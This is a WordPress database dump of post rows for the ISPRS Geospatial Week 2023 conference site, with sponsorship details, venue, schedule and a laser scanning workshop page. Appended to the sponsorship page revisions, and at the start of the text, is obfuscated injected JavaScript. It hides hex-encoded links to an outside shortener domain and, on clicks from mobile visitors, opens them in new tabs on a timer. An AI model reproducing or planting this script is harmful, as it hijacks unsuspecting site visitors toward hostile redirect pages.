|nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SPONSORSHIP AND EXHIBITION','','inherit','closed','closed','','2920-revision-v1','','','2022-10-26 16:26:39','2022-10-26 16:26:39','',2920,'https://gsw2023.com/?p=2944',0,'revision','',0),
(2945,1,'2022-10-26 16:28:29','2022-10-26 16:28:29','<p>[vc_row][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><strong>ISPRS GEOSPATIAL WEEK 2023</strong></h3>\n<h3 style=\"text-align: center;\"><strong>SPONSORSHIP AND EXHIBITION - Cairo – Egypt 2-7 September 2023</strong></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>The Arab Academy for Science, Science, and Maritime Transport as the ISPRS GSW2023 organizer would like to invite you to participate as a sponsor / exhibitor at the Geospatial Week 2023, which will be held in Cairo, Egypt on 2-7 September 2023.</h5>\n<h5></h5>\n<h5>The Geospatial Week is an internationally renowned scientific event held once every two years. The event is organized by the International Society of Photogrammetry and Remote Sensing (ISPRS) to bring together expertise in the fields of photogrammetry, remote sensing, and geospatial information science. Some 1000 to 2000 researchers and professionals from around the world gathered for an entire week to share new findings and experiences through a series</h5>\n<h5>of dedicated workshops. More information regarding ISPRS can be found at:</h5>\n<h5><u><a href=\"https://www.isprs.org/\">-www.isprs.org.</a></u></h5>\n<h5></h5>\n<h5>-An exhibition will also be held during the conference. This provides companies in the field with the opportunity to be involved and showcase their products, services, and expertise to an international audience. As a professional, you also get the chance to attend the presentations and follow the latest scientific developments in the field. Conference attendees are free to wander around the exhibition area during the workshops, coffee and lunch breaks. Participants can register for any number of days.</h5>\n<h5></h5>\n<h5>-A number of sponsorship and exhibition packages are available. Tailor-made options are also available, interested companies to contact the GSW Director Prof. Naser El-Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> for more details on the sponsorship opportunities for the GSW/2023.</h5>\n<h5></h5>\n<h5>-We hope you will consider the opportunity to participate at the ISPRS Geospatial Week 2023 and look forward to meeting you in Cairo!</h5>\n<h5></h5>\n<h5>The GSW2023 Organizing Committee.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"chino\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h4><strong>SPONSORSHIP AND EXHIBITION PACKAGES</strong></h4>\n<p><strong>Sponsorship options include the opportunity to give oral presentations about your company’s products, exhibition booths, live demonstrations and the ability to give a half-day interactive tutorial of your software or product on Sunday. More information regarding the various packages and additional à la carte options is given below. If you would like to discuss other sponsorship options or tailor-made packages, please contact the GSW Director Prof. Naser El- Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> or <u><a href=\"mailto:info@gsw2023.com\">info@gsw2023.com</a></u> .</strong>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2930\" img_size=\"1600x2000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner][vc_column_text]</p>\n<h5><strong>Venue - INTERCONTINENTAL  CAIRO SEMIRAMIS</strong></h5>\n<p>(<u>https:/<a href=\"http://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc\">/www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc</a>=nav_hotel</u> <u>detail_undefined</u>)</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>The GSW2023 will take place on the historic Semiramis hotel site, guests can enjoy modern luxury on the River Nile. This Cairo hotel features a rooftop pool, fine dining with exquisite cuisine for every taste, conference facilities, a state-of-the-art Spa, a shopping arcade, with the Nile Terrace offering stunning views of the sunset over the Nile. Located at a premium location in the heart of the city center, the hotel offers complimentary WIFI and is located next to the Egyptian Museum and bazaars of old Cairo.</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2936\" img_size=\"1000x500\" alignment=\"center\" onclick=\"zoom\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>SPONSORSHIP TIMETABLE AND DEADLINES</h5>\n<p><strong>Upon registration, the sponsor’s logo and level of support will be published on the GSW2023 website.</strong></p>\n<p>&nbsp;</p>\n<ul>\n<li><strong>March 1, 2023 Deadline for sponsorship confirmation and payment</strong></li>\n<li><strong>June 1, 2013 Delivery of sponsorship material to be included in conference bags to:</strong></li>\n</ul>\n<p>&nbsp;</p>\n<h5>The Arab Academy for Science, Science, and Maritime Transport</h5>\n<h6><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h6>\n<h5></h5>\n<h5><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5><strong>Tel :(+203) 5497598</strong></h5>\n<h5><b>Fax:(+203) <strong>5497598</strong></b></h5>\n<p>&nbsp;</p>\n<p><strong>Main Campus</strong></p>\n<p><strong> Alexandria, </strong><strong>Miami </strong><strong>Campus</strong></p>\n<p><strong>P.O. Box 1029 -Gamal Abdelnaser st. </strong><strong>-Miami </strong></p>\n<p><strong>Tel :(+203) 5565429/ 5506042</strong></p>\n<p><b>Fax:(+203) 5487786/ 5506042  </b></p>\n<p>&nbsp;</p>\n<p><strong>Alexandria, </strong><strong>Abu kir Campus</strong></p>\n<p><strong>Tel :(+203) 5622366/ 5622388</strong></p>\n<p><b>Fax:(+203) 5610950</b>[/vc_column_text][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][ultimate_info_table design_style=\"design04\" color_scheme=\"blue\" package_heading=\"CONFERENCE PROGRAM FOR EXHIBITORS\"]</p>\n<table>\n<tbody>\n<tr>\n<td width=\"170\">\n<h5><strong>September 2</strong></h5>\n</td>\n<td width=\"189\">\n<h5><strong>9:00 – 5:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5><strong>Tutorial Day</strong></h5>\n<h5><strong>Exhibition Setup</strong></h5>\n</td>\n</tr>\n<tr>\n<td width=\"170\">\n<h5><strong>September 3</strong></h5>\n</td>\n<td width=\"189\">\n<h5></h5>\n<h5><strong>12:00-17:00</strong></h5>\n<h5><strong>18:00 – 20:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5></h5>\n<h5><strong>Exhibition Opening</strong></h5>\n<h5><strong>Welcome Reception</strong></h5>\n</td>\n</tr>\n<tr>\n<td width=\"170\">\n<h5><strong>September 4</strong></h5>\n</td>\n<td width=\"189\">\n<h5></h5>\n<h5><strong>9:00 – 17:00</strong></h5>\n<h5><strong>18:00 – 20:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5></h5>\n<h5><strong>Exhibition</strong></h5>\n<h5><strong>Exhibitors’ reception</strong></h5>\n</td>\n</tr>\n<tr>\n<td width=\"170\">\n<h5><strong>September 5</strong></h5>\n</td>\n<td width=\"189\">\n<h5></h5>\n<h5><strong>9:00 – 15:00</strong></h5>\n<h5><strong>15:00 – 18:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5></h5>\n<h5><strong>Exhibition</strong></h5>\n<h5><strong>Dismantle Exhibition</strong></h5>\n</td>\n</tr>\n</tbody>\n</table>\n<p>[/ultimate_info_table][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>The Organizing Committee reserves the right to change these times to better fit the final program if necessary. Allocation of the booths will be on a first-come-first-served basis upon receiving the confirmation and payment, with preference given to the companies who request multiple booths</strong></h5>\n<p>&nbsp;</p>\n<h5><strong>INFORMATION</strong></h5>\n<p><strong>For more information visit the Geospatial Week 2023 website: www.gsw2023.com or contact<a href=\"mailto:elsheimy@ucalgary.ca\"> the organizing committee by mail (elsheimy@ucalgary.ca</a> or <u><a href=\"mailto:info@gsw2023.com\">info@gsw2023.com</a></u></strong> ).[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SPONSORSHIP AND EXHIBITION','','inherit','closed','closed','','2920-revision-v1','','','2022-10-26 16:28:29','2022-10-26 16:28:29','',2920,'https://gsw2023.com/?p=2945',0,'revision','',0),
(2946,1,'2022-11-02 14:46:36','2022-11-02 14:46:36','','Jan Boehm,<br>University College London, United Kingdom<br>(WG II/2)','','publish','open','closed','','jan-boehmuniversity-college-london-united-kingdomwg-ii-2','','','2022-11-02 16:45:29','2022-11-02 16:45:29','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2946',0,'dt_team','',0),
(2948,1,'2022-11-02 15:02:27','2022-11-02 15:02:27','','w171','','inherit','open','closed','','w171','','','2022-11-02 15:02:27','2022-11-02 15:02:27','',2946,'https://gsw2023.com/wp-content/uploads/2022/11/w171.jpg',0,'attachment','image/jpeg',0),
(2949,1,'2022-11-02 15:08:47','2022-11-02 15:08:47','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2954\" img_size=\"1600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Laser Scanning 2023</strong></span></h5>\n<h5></h5>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>Laser scanning 2023 is the 12th of a series of ISPRS workshops covering various aspects of space-borne, airborne, mobile and terrestrial laser scanning in， indoor, underground and outdoor environments. The workshop brings together experts who focus on processing and using point cloud data acquired from laser scanners and other active 3D imaging systems, such as range cameras and gaming sensors including terrestrial, mobile, aerial, unoccupied aerial and space-borne sensing platforms. Topics include all aspects related to sensor calibration, data acquisition and data processing including notably registration, feature extraction, classification, segmentation, object detection, big data processing, data fusion, 3D modelling, BIM and change analysis. The workshop will be part of the ISPRS Geospatial Week 2023 and in Cairo, Egypt in parallel with several related geospatial workshops. The event will be held as a two-day single-track workshop of oral presentations and poster sessions. </strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/3\"][vc_single_image image=\"2953\" alignment=\"center\"][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2950\" alignment=\"center\"][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2955\" alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><u>Chairs</u></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"54\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Themes of event:</u></strong></h5>\n<table width=\"0\">\n<tbody>\n<tr>\n<td width=\"288\">\n<h5><strong>Acquisition </strong></h5>\n<p>•      Airborne, terrestrial, automotive, bathymetric LIDAR</p>\n<p>•      Range imaging and gaming sensors</p>\n<p>•      Single Photon LIDAR, Multi-spectral LIDAR, Solid-state LIDAR</p>\n<p>•      Ubiquitous point cloud sensing and mapping</p>\n<p>&nbsp;</td>\n<td width=\"274\">\n<h5><strong>System and Signal analysis </strong></h5>\n<p>•      Sensor and system calibration and validation</p>\n<p>•      Error modelling</p>\n<p>•      Data fusion (LiDAR, RADAR, imagery)</p>\n<p>•      Denoising</p>\n<p>&nbsp;</td>\n</tr>\n<tr>\n<td width=\"288\">\n<h5><strong>Point Cloud Processing </strong></h5>\n<p>•      Point cloud registration &amp; denoising</p>\n<p>•      Segmentation</p>\n<p>•      Classification</p>\n<p>•      fusion</p>\n<p>•      3D Modelling</p>\n<p>•      Feature extraction and object recognition</p>\n<p>•      Change analysis</p>\n<p>•      Big Data processing</p>\n<p>•      Scan-to-BIM</p>\n<p>&nbsp;</td>\n<td width=\"274\">\n<h5><strong>Applications</strong></h5>\n<p>•        Thematic mapping and monitoring</p>\n<p>•        Modelling anthropogenic and natural areas</p>\n<p>•        Natural resource mapping</p>\n<p>•        Biodiversity assessment</p>\n<p>•        Precision farming</p>\n<p>•        Forest mapping and carbon storage</p>\n<p>•        Geohazards analysis</p>\n<p>•        Infrastructure monitoring</p>\n<p>•        Large-scale urban modelling</td>\n</tr>\n</tbody>\n</table>\n<p>&nbsp;</p>\n<p><strong>Organizing Committee:</strong></p>\n<p>Jan Boehm (WG II/2), UCL, United Kingdom</p>\n<p>Bisheng Yang (WG II/2), LIESMARS, Wuhan University, China</p>\n<p>Martin Weinmann, KIT, Germany</p>\n<p>Katharina Anders,  Heidelberg University</p>\n<p>Ruisheng Wang, University of Calgary</p>\n<p>&nbsp;</p>\n<p><strong>Scientific Committee (to be confirmed):</strong></p>\n<p style=\"font-weight: 400;\">Ahmad Baik (King Abdul Aziz University, Saudi Arabia)</p>\n<p style=\"font-weight: 400;\">Andreas Mayr (University of Innsbruck, Austria)</p>\n<p style=\"font-weight: 400;\">Antero Kukko (Finnish Geospatial Research Institute, Finland)</p>\n<p style=\"font-weight: 400;\">Bernhard Höfle (Heidelberg University, Germany)</p>\n<p style=\"font-weight: 400;\">Camillo Ressl (TU Vienna, Austria)</p>\n<p style=\"font-weight: 400;\">Christoph Holst (TU Munich, Germany)</p>\n<p style=\"font-weight: 400;\">Daniel Wujanz (Technet, Germany)</p>\n<p 